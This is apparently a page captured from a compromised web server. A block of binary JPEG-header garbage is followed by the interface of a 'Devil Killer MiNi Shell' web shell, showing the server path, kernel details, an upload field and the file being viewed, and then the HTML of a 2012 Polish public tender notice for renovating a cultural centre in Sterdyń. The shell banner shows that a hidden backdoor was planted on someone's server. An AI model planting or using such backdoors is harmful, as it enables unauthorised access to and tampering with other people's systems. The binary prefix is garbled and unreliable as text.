JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120323/92304-N-2012.html

<p class="kh_header"><b>Sterdyń: Remont wewnętrzny budynku GOKiS w Sterdyni</b><br>
<b>Numer ogłoszenia: 92304 - 2012; data zamieszczenia: 23.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Kultury i Sportu , ul. Lipowa 2, 08-320 Sterdyń, woj. mazowieckie, tel. 0 25  787 02 65, faks 0 25  787 02 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sterdyn.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont wewnętrzny budynku GOKiS w Sterdyni.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje :
1.	Wymiana instalacji:
a)	tablice rozdzielcze o masie do 20 kg - 1 szt;
b)	tablice rozdzielcze o masie do 20 kg - 1 szt;
c)	wypusty wykonywane przewodami wtynkowymi w budynkach mieszkalnych na przełącznik podłoże betonowe - 95 wyp;
d)	wypusty wykonywane przewodami wtynkowymi w budynkach mieszkalnych na gniazdo wtynkowe 10A i 10A/Z podłoże betonowe - 48 wyp;
e)	wypusty wykonywane przewodami wtynkowymi w budynkach mieszkalnych na gniazdo wtynkowe 10A i 10A/Z podłoże betonowe - 5 wyp;
f)	wypusty wykonywane przewodami wtynkowymi w budynkach mieszkalnych na gniazdo wtynkowe 10A i 10A/Z podłoże betonowe pozostałe  - 8 wyp;
g)	wypusty wykonywane przewodami wtynkowymi w budynkach mieszkalnych na gniazdo wtynkowe 10A i 10A/Z podłoże betonowe na przycisk PPOŻ - 2 wyp;
h)	oprawy oświetleniowe w sufitach podwieszanych - świetlówkowa 4x40W - 83 kpl;
i)	oprawy oświetleniowe w sufitach podwieszanych - żarowa, halogenowa, compact - 12 kpl;
j)	aparaty elektryczne o masie do 2,5 kg - 15 szt;
k)	oprawy oświetleniowe przykręcane (zwykłe) - żarowa - 5 kpl;
l)	sprawdzenie i pomiar 1-fazowego obwodu elektrycznego niskiego napięcia - 30 pomiar;
m)	sprawdzenie i pomiar 3-fazowego obwodu elektrycznego niskiego napięcia - 10 pomiar;
n)	sprawdzenie samoczynnego wyłączania zasilania (pierwsza próba)- 2 próby;
o)	sprawdzenie samoczynnego wyłączania zasilania (następna próba) - 5 prób;
p)	badania i pomiary instalacji skuteczności zerowania (pierwszy pomiar) - 1 szt;
q)	badania i pomiar instalacji skuteczności zerowania (każdy następny pomiar) - 140 szt;
r)	wykucie bruzd dla przewodów wtynkowych w betonie - 1500m;
s)	przebijanie otworów śr.25mm o dł. do 40 cm w ścianach lub stropach z betonu - 80 otw;
2.	Stolarka i roboty towarzyszące
a)	wykucie z muru ościeżnic drewnianych drzwiowych o pow. ponad 2m2 - 14,678m2;
b)	wykucie z muru ościeżnic stalowych drzwiowych o pow. ponad 2m2 - 13,650m2;
c)	montaż drzwi aluminiowych dwuskrzydłowych - wypełnienie panelem pełnym - zimne - wyposażone w zamek zwykły i blokadę skrzydeł od dołu - 8,225m2
d)	montaż drzwi aluminiowych dwuskrzydłowych - całe szklone szkłem bezpiecznym - zimne- wyposażenie w zamek zwykły i blokadę skrzydeł od dołu - 12,108m2;
e)	wykucie otworów w ścianach z cegieł o grub.ponad ? ceg. na zaprawie wapiennej lub cementowo-wapiennej dla otworów drzwiowych w pomieszczeniach biurowych - 1,624m3;
f)	wykonanie przysklepień otworów w scianach z cegieł z wykuciem gniazd dla belek - 1,475m3;
g)	wykonanie przysklepień otworów w ścianach z cegieł - dostarcz.i obsadz.belek stalowych I NP 160mm - 7,000m
h)	drzwi zewnętrzne płycinowe pełne jednoskrzydłowe bez naświetl o pow. ponad 1,5 m2 wyposażone w zamek patentowy - 1,800 m2;
i)	wykucie otworów w ścianach z cegieł o grub. ? ceg. na zaprawie wapiennej lub cementowo-wapiennej dla otworów drzwiowych i okiennych - powiększenie otworów drzwiowych w pokoju dyrektora oraz łazience damskiej i męskiej - 1,890m2
j)	wykucie z muru ościeżnic stalowych drzwiowych o pow. do 2m2 - 3 szt;
k)	obsadzenie ościeżnic stalowych o pow. otworu do 2,0 m2 w ścianach z cegieł - 5,40 m2;
l)	ościeżnice drzwiowe stalowe dwukrotnie malowane na budowie 70*200 dla drzwi wwnątrzlokalowych łazienkowych wbudowane w trakcie wznoszenia ścian - 4 szt;
m)	dwukrotne malowanie farbą olejną ościeżnic metalowych - 16,90m2;
n)	skrzydła drzwiowe płycinowe wewnętrzne jednodzielne pełne o pow. do 1,6 m2 fabrycznie wykończone - 18,80m2;
o)	skrzydła drzwiowe płycinowe wewnętrzne łazienkowe jednodzielne szklone o pow. do 1,6 m2 oszklone szybą o pow. do 0,2m2 fabrycznie wykończone - 13,00m2;
p)	wrota do garaży stalowe ocieplone rozwierane dwuskrzydłowe z ościeżnicą i zamkiem kompletne. Wyposażenie w blokady przeciwwiatrowe - 4,648m2.
3.	Remont sufitów
a)	konstrukcje rusztów pod okładziny z płyt gipsow. pojedyńcze z kształtow. metal. na stropach - 87,096m2;
b)	okładziny z płyt gips-kartonowych grubości 12,5mm pojedyńcze na stropach na rusztach metalowych. Uwaga: w łazienkach płyty wodoodporne - 87,096m2;
c)	 zeskrobanie i zmycie starej farby z sufitów w pomieszczeniach o pow. podłogi ponad 5m2 - 327,027m2;
d)	przygotowanie powierzchni pod malowanie farbami emulsyjnymi starych tynków z poszpachlow. nierówności na sufitach - 45,199m2;
e)	dwukrotne malowanie farbami emulsyjnymi starych tynków wewnętrznych sufitów - 45,199m2
f)	przygotowanie starego podłoża pod gładzie gipsowe na sufitach - jednokrotne gruntowanie emulsją UNI-GRUNT - 281,828m2;
g)	tynki (gładzie) jednowarstw.wewn.gr.3mm z gipsu szpachlow.wyk.ręcz.na stropach na podłożu z tynku - 281,829m2;
h)	dwukrotne malowanie farbami akrylowymi w kolorze białym powierzchni wewnętrznych - podłoży gipsowych z gruntowaniem - 281,829m2;
i)	dwukrotne malowanie farbami akrylowymi w kolorze białym powierzchni wewnętrznych - płyt gipsowych spoinowanych szpachlowanych z gruntowaniem na sufitach podwieszanych - 87,096m2;
j)	malowanie farbami akrylowymi w kolorze białym powierzchni wewnętrznych - płyt gips. spoinowanych szpachlow. z gruntow. - dod. za każde dalsze malowanie - 87,096 m2;
k)	przygotowanie starego podłoża płyt korytkowych na suficie nad sceną- jednokrotne gruntowanie emulsją UNI-GRUNT - 119,340m2;
l)	tynki (gładzie) jednowarstw.wewn. gr. 3mm z gipsu szpachlow.wyk. ręcz. na stropach na podłożu betonowym - na płytach korytkowych - 119,340m2;
m)	dwukrotne malowanie farbami akrylowymi w kolorze białym powierzchni wewnętrznych - podłoży gipsowych z gruntowaniem - płyt korytkowych - 119,340m2;
n)	dwukrotne malowanie farbą olejną powierzchni metal. pełnych - konstrukcji stalowej nad sceną - 52,080m2;
o)	rusztowania ramowe warszawskie 6m - do robót na suficie nad sceną - 81,60m2.
4.	Remont ścian:
a)	rozebranie wykładziny ściernej z płytek glazurowanych - 63,132m2;
b)	rozebranie ścianek działowych z płyt wiórowych na kształtownikach stalowych - 16,560m2;
c)	uzupełnienie ścianek z cegieł dziurawek o gr. ? cegły na zaprawie cementowej - 14,280m2;
d)	dodatek za zbrojenie bednarką ścianek grub.1/4 ceg. - 14,280m2;
e)	uzupełnienie tynk.zwyk.wew.kat.II z zapr.cem-wap na scian. i słup.prostok. na podł. z cegły i pustaków (do 5m2 w 1 miej.) - pod glazurę - 108,052m2;
f)	uzup.tynk.zwykł.wew.kat.III z zapr.cem-wap. na ścian.i słup.prostok. na podłożu z cegły i pustaków (do 2 m2w 1 miej.) - 10 m2;
g)	wyk. tynków zwykłych wewn.wewn.kat.III z zaprawy cem-wap na ościeżach szer. do 15 cm - po zamontowanych drzwiach wewnętrznych i oknach w całym obiekcie - 80m;
h)	wyk. pasów tynku zwyk.kat.III o szer. do 10 cm na murach z cegieł lub ścianach z betonu pokryw. bruzdy z przewodami elektrycznymi - po robotach elektrycznych i sanitarnych - 200,00m;
i)	licowanie ścian płytkami glazurowanymi o wymiarach 20x20cm na klej metodą zwykła - 135,892m2;
j)	osadzenie listew wykończających przy licowaniu ścian płytkami w pomieszczeniach o pow. do 8m2 - 105,070m;
k)	obsadzenie kratek wentylacyjnych w ścianach z cegieł - 20,0szt;
l)	obudowa pionów kanalizacyjnych płytami gipsowo-kartonowymi grub.12,5mm wodoodpornymi na rusztach metal.pojedyn.dwuwarstw.55-02 - 15,457m2;
m)	zeskrobanie i zmycie starej farby z powierzchni ścian w pomieszczeniach o pow. podłogi ponad 5m2 - 1181,877m2;
n)	skasowanie wykwitów (zacieków) na ścianach - 5,84m2;
o)	przygotowanie powierzchni pod malowanie farbami emulsyjnymi starych tynków z poszpachlow. nierówności na ścianach - 185,213m2;
p)	dwukrotne malowanie farbami emulsyjnymi starych tynków wewnętrznych ścian w kolorach pastelowych - 185,213m2;
q)	przygotowanie starego podłoża pod wykonanie gładzi gipsowych na ścianach - jednokrotne gruntowanie emulsją UNI-GRUNT - 996,664m2;
r)	tynki (gładzie) jednowarstw.wewn. gr.3 mm z gipsu szpachlow. wyk. ręcz. na ścianach na podłożu z tynku - 996,664m2;
s)	ochrona narożników wypukłych kątownikiem metalowym p/g- 312,01m;
t)	dwukrotne malowanie farbami akrylowymi trudnozmywalnymi w kolorach pastelowych powierzchni wewnętrznych -podłoży gipsowych z gruntowaniem na ścianach - 996,664m2;
u)	dwukrotne malowanie farbami olejnymi podokienników lasrykowych wewnętrznych z dwukrotnym szpachlowaniem - 5,144m2;
v)	obsadzenie podokienników z konglomeratu 70x25cm - 1 szt;
w)	obsadzenie podokienników z konglomeratów o wymiarze 210x25cm - 2 szt;
x)	dwukrotne malowanie farbą olejną uprzednio malowanej stolarki okiennej o pow. ponad 1,0m2 - 2,499m2;
y)	dwukrotne malowanie farbą olejną rur wodociągowych i gazowych o śr. do 50mm - 150m;
5.	Remont posadzek
a)	schody żelbetowe - stopnie betonowe wewn. na gotowym podłożu - 1,92m3
b)	rozebranie posadzek z deszczułek z oderwaniem listew lub cokołów - 70,586m2;
c)	rozebranie cokolika z płytek na ścianach - 100,84m;
d)	rozebranie posadzki z płytek na zapr. cem. - 37,739m2;
e)	zerwanie posadzki z tworzyw sztucznych - 38,425m2;
f)	zerwanie z podłóg płyt paździerzowych - 38,425m2;
g)	gruntowanie posadzek preparatami UNI GRUNT - powierzchnie poziome - 280,589m2;
h)	posadzki płytkowe z kamieni sztucznych układane na klej - przygotowanie podłoża - 280,59m2;
i)	posadzki płytkowe z płytek terakotowych; płytki 30x30cm układane na klej metodą kombinowaną - 25,043m2;
j)	posadzki płytkowe z płytek GRESU płytki 30x30cm układane na klej metodą kombinowana - 255,547m2;
k)	okładziny schodów z płytek gresu 30x30 cm układanych na klej metodą kombinowaną - 6,0m2
l)	cokoliki płytkowe z kamieni sztucznych z płytek 30x30 - cokolik 15cm układane na klej z przecinaniem płytek - przygotowanie podłoża - 216,52m;
m)	cokoliki płytkowe z gresu z płytek 30x30 - cokolik 15cm układane na klej z przecinaniem płytek metodą zwykła - 216,52m;
n)	rozebranie podłóg białych na wpust - 71,88m2;
o)	podłoga z desek struganych gr. 32 mm - 71,88m2;
p)	ocyklinowanie podłogi z desek - 71,88m2;
q)	impregnacja ogniochronna podłogi z desek - 71,88m2;
r)	lakierowanie trzykrotne podłogi z desek - 71,88m2.
6.	Wymiana instalacji centralnego ogrzewania - roboty demontażowe
a)	demontaż grzejnika żeliwnego członowego o pow. ogrzew.do 2,5m2 - 12 kpl;
b)	demontaż grzejnika żeliwnego członowego o pow. ogrzew.do 5,0m2 - 7 kpl;
c)	demontaż grzejnika żeliwnego członowego o pow. ogrzew. do 7,5m2 - 12 kpl;
d)	demontaż grzejnika żeliwnego członowego o pow.ogrzew. do 10,0m2 - 2 kpl;
e)	demontaż grzejnika stalowego z rur stalowych ożebrowanych o śr. do 65 mm o długości do 2m - 8 szt;
f)	demontaż grzejnika stalowego z rur stalowych ożebrowanych o długości do 3m o śr.do 65mm - 2 szt;
g)	demontaż grzejnika stalowego z rur stalowych ożebrowanych o długości do 4m o śr. do 65mm - 1 szt;
h)	demontaż grzejnika stalowego z rur stalowych ożebrowanych o długości do 5m o śr. do 65mm - 2 szt;
7.	Demontaż armatury centralnego ogrzewania 
a)	demontaż zaworu grzejnikowego lub dwuzłączki o śr. 15-20mm - 46 szt;
b)	demontaż zaworu przelotowego o śr. 25-32 mm - 4 szt;
c)	demontaż zaworu przelotowego o śr. 40-50mm - 2szt;
8.	Demontaż rurociągów stalowych centralnego ogrzewania 
a)	demontaż rurociągu stalowego o połączeniach spawanych o śr. 10-15mm - 446,0m;
b)	demontaż rurociągu stalowego o połączeniach spawanych o śr. 25mm - 56m;
c)	demontaż rurociągu stalowego o połączeniach spawanych o śr. 32mm - 74m;
d)	demontaż rurociągu stalowego o połączeniach spawanych o śr. 40-50mm - 18m;
9.	Montaż rurociągów centralnego ogrzewania
a)	rurociągi miedziane o śr. zewn i gr. ścianki 18x1mm na przegrodach budowlanych z kapilarnym połączeniem elementów lutem miękkim w budynkach mieszkalnych - 126,0m;
b)	rurociągi miedziane o śr. zewn i gr. ścianki 22x1mm na przegrodach budowlanych z kapilarnym połączeniem elementów lutem miękkim w budynkach mieszkalnych - 62 m;
c)	rurociągi miedziane o śr. zewn i gr. ścianki 28x1,5mm na przegrodach budowlanych z kapilarnym połączeniem elementów lutem miękkim w budynkach mieszkalnych - 56,0m;
d)	rurociągi miedziane o śr. zewn i gr. ścianki 35x1,5mm na przegrodach budowlanych z kapilarnym połączeniem elementów lutem twardym w budynkach mieszkalnych - 74,0m;
e)	rurociągi miedziane o śr. zewn i gr. ścianki 54x1,5mm na przegrodach budowlanych z kapilarnym połączeniem elementów lutem twardym w budynkach mieszkalnych - 16,0m;
f)	punkty stałe do rurociągów miedzianych, lutowane o śr. zewn. i gr.ścianki 54x2mm - 1 szt;
g)	punkty stałe do rurociągów miedzianych, lutowane o śr. zewn. i gr.ścianki 35x1,5mm - 4 szt;
h)	punkty stałe do rurociągów miedzianych, lutowane o śr. zewn. i gr.ścianki 28x1,5mm - 2 szt;
i)	kompensatory U-kształtowe z 4-ch kolan 90 st. i 3-ch odcinków rur miedzianych lutowane o śr zewn.54 mm - 1 szt;
j)	kompensatory U-kształtowe z 4-ch kolan 90 st. i 3-ch odcinków rur miedzianych lutowane o śr zewn.35 mm - 2 szt;
k)	kompensatory U-kształtowe z 4-ch kolan 90 st. i 3-ch odcinków rur miedzianych lutowane o śr zewn.28 mm - 2 szt;
l)	podejście do pionu c.o. o śr. zew.28mm - 5 szt;
m)	podejście do pionu c.o. o śr. zew.22mm - 25 szt;
10.	Montaż armatury odcinającej i regulacyjnej 
a)	filtry osadnikowe siatkowe śr.nom.armatury 50mm - 1 szt;
b)	zawory kulowe i zwrotne przelotowe, gwintowane do c.o. nom.50mm - 2 szt;
c)	zawory kulowe i zwrotne przelotowe, gwintowane do c.o. nom.32mm - 6 szt;
d)	zawory kulowe i zwrotne przelotowe, gwintowane do c.o. nom.25mm - 6 szt;
e)	zawory kulowe i zwrotne przelotowe, gwintowane do c.o. nom.20mm - 8 szt;
f)	różnicowe regulatory ciśnienia śr.nom. 25mm - 5 szt;
g)	różnicowe regulatory ciśnienia śr.nom. 20mm -25 szt;
h)	zawory kulowe i zwrotne przelotowe gwintowane do c.o. sr.nom.15mm - 30 szt;
i)	odpowietrzniki automatyczne śr.nom. 15 mm - 30 kpl;
11.	Montaż grzejników
a)	rury przyłaczne o śr. zew. 15mm do grzejnika c.o. płytowego, konwektorowego lub członowego na ścianach - 46 kpl;
b)	zawory grzejnikowe termostatyczne o podwójnej regulacji, proste lub kątowe z głowicami termostatystycznymi, śr. nom. 15mm - 46 pkl;
c)	zawory grzejnikowe powrotne proste lub kątowe śr. nom.15mm - 46 szt;
d)	kurki spustowe za złączką do węża śr. nom.15mm - 46 szt;
e)	grzejniki stalowe dwupłytowe typ C22,V22 o wys.300-900mm i dł.400-800mm, montaż grzejników na ścianie - 24 szt;
f)	grzejniki stalowe dwupłytowe typ C22, V22 o wys. 300-900mm i dł. 1000-1400mm, montaż grzejników na ścianie - 8 szt;
g)	grzejniki stalowe dwupłytowe typ C22, V22 o wys. 300-900mm i dł. 1600-2000mm, montaż grzejników na ścianie - 6 szt;
h)	grzejniki stalowe dwupłytowe typ C22, V22 o wys. 300-900mm i dł. 2300-3000mm, montaż grzejników na ścianie - 8 szt;
12.	Próby szczelności i regulacje instalacji
a)	próba szczelności instalacji c.o. w budynkach niemieszkalnych - płukanie instalacji czynności przygotowawcze i zakończeniowe do wykonania próby o śr.zewn.do 54mm - 334,0m;
b)	próba szczelności instalacji c.o. w budynkach niemieszkalnych - próba wodna ciśnieniowa - 334,0m;
c)	próba na gorąco instalacji z dokonaniem regulacji - 46,0 szt.grz.
13.	Izolacje termiczne rurociągów 
a)	izolacja rurociągów śr. 54-70mm otulinami Thermaflex FRZ - jednowarstwowymi gr. 30mm - 16m;
b)	izolacja rurociągów śr. 28-48mm otulinami Thermaflex FRZ - jednowarstwowymi gr. 30mm - 160m;
c)	izolacja rurociągów śr. 12-22mm otulinami Thermaflex FRZ - jednowarstwowymi gr. 30mm - 30m..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.22.11.00-5, 45.26.25.00-6, 45.41.00.00-4, 45.44.21.00-8, 45.43.21.12-2, 45.30.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości  9.000,00zł (słownie: dziewięć tysięcy  złotych).
Wadium może być wnoszone w jednej lub kilku następujących formach:
	1)	pieniądzu na rachunek bankowy Gminnego Ośrodka Kultury i Sportu w Sterdyni: 62 9221 0000 0020 0820 2000 0010;
	2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym,           że poręczenie kasy jest zawsze poręczeniem pieniężnym;
	3)	gwarancjach bankowych;
	4)	gwarancjach ubezpieczeniowych;
	5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia wyżej wymienione warunki.Wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia - co najmniej : 
- 2 roboty budowlane branży budowlanej (w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie), o wartości minimum 350.000,00 zł każda (wzór stanowi Załącznik Nr 4 do SIWZ).
Dla każdej pozycji wykazu należy załączyć dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia wyżej wymienione warunki.Oświadczenie o posiadaniu uprawnień budowlanych do kierowania robotami budowlanymi:
a)	kierownik robót budowalnych
oraz oświadczenie o posiadaniu aktualnego zaświadczenia, wydanego przez właściwą izbę samorządu zawodowego lub innego równoważnego dokumentu zgodnie z warunkami ustanowionymi przez prawo państw członkowskich Unii Europejskiej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

